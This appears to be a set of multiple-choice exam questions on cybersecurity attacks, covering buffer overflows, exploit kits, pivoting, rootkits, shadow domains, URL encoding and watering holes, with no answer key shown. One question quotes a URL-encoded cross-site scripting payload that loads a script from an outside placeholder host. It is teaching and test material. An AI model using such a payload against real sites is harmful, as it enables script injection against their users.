What is one of the main causes of successful buffer overflow attacks?
A. careless users violating acceptable use policy
B. poorly written application code that does not validate input data size
C. intentional installation of illegitimate software
D. bad luck of the user who falls victim to such an attack
What function is performed by an attacker running "whoami" from the command shell?
A. learn which user account that they are running under and the domain it is running under
B. determine the registrant that the domain web services are running under
C. map IP address back to domain names on the network
D. list all users who are logged on to the machine
What is the purpose of an exploit kit in a client-side attack?
A. hides an iframe in a legitimate webpage to redirect the user to an exploit server
B. profiles the user's computer and delivers exploit code to the computer based on its OS, browser, and applications
C. beacons to an attacker's command and control servers, allowing the attacker to issue commands to the user's machine
D. compromises a web-server to carry out DDoS attacks as part of a botnet
How can you protect an organization from pivoting attacks? (Choose four.)
A. use the personal firewall on all the hosts to prevent any outbound access
B. monitor the network closely, observe the logs, and follow up on anything that looks suspicious
C. keep software updates and security patches current
D. limit user accounts to minimal privileges
E. limit the ability of user machines to interact with each other
How can an organization protect against a privilege escalation attack?
A. Use a common password for multiple accounts so the users do not need to write it down on a sticky note at their desk.
B. Exercise a strong password policy that includes the requirement of unique passwords for multiple accounts.
C. Assign new passwords to employees every 30 days.
D. Use open authentication on wireless and guest networks.
What are the two best ways to protect a device from a rootkit attack? (Choose two.)
A. Do nothing, because rootkits are not common and are difficult to develop.
B. Keep current with software updates and security patches from the vendor.
C. Maintain a strong password policy.
D. Utilize anti-malware, anti-virus, and next generation firewall and IPS services within the network.
Regarding exploit kits, which option explains what a shadow domain is?
A. a second-level domain that is registered by a malicious person using compromised domain registration information from a legitimate site
B. the series of redirects that a web browser goes through when a web page is unavailable due to being moved
C. websites set up by a company's information security teams to act as a "honey pot" to catch malicious actors who may try to deface their website
D. domains that are registered with dynamic DNS or fast flux DNS services to keep the domain and IP addresses frequently rotating to prevent detection by scanning tools
Referring to the suspicious URL that is shown below, which three statements are correct? (Choose three.)
http://www.example.com/script.php?data=%3cscript%20src=%22http%3a%2f%2fwww.example1.com%2ftest.js%22%3e%3c%2fscript%3e
A. The www.example.com web server has a vulnerable PHP script.
B. The attacker is attempting to cause the www.example.com web server to execute an external script from the www.example1.com server.
C. The attacker is attempting to hide the attack by encoding part of the URL.
D. The attacker is exploiting a vulnerability in the client web browser using a PHP script.
E. The attacker is using directory traversal to access a directory that is outside of the www.example.com web server's root directory.
When a URL is encoded to hide an attack, what value can the forward slash (/) character be encoded as?
A. %20
B. %2f
C. %3c
D. %5c
How do watering hole attacks avoid detection by scanning services?
A. by focusing the malware of its campaign so that it is only delivered to visitors from the IP address range of the target organization
B. by compromising the web server of an innocent bystander, so that the malware attack cannot be attributed to servers owned by the attacker
C. by compromising DHCP servers of home routers so that the users will be directed to the websites that are compromised by the attacker
D. by delivering email only to valid email addresses that are targeted from a specific list so that the volume of traffic stays low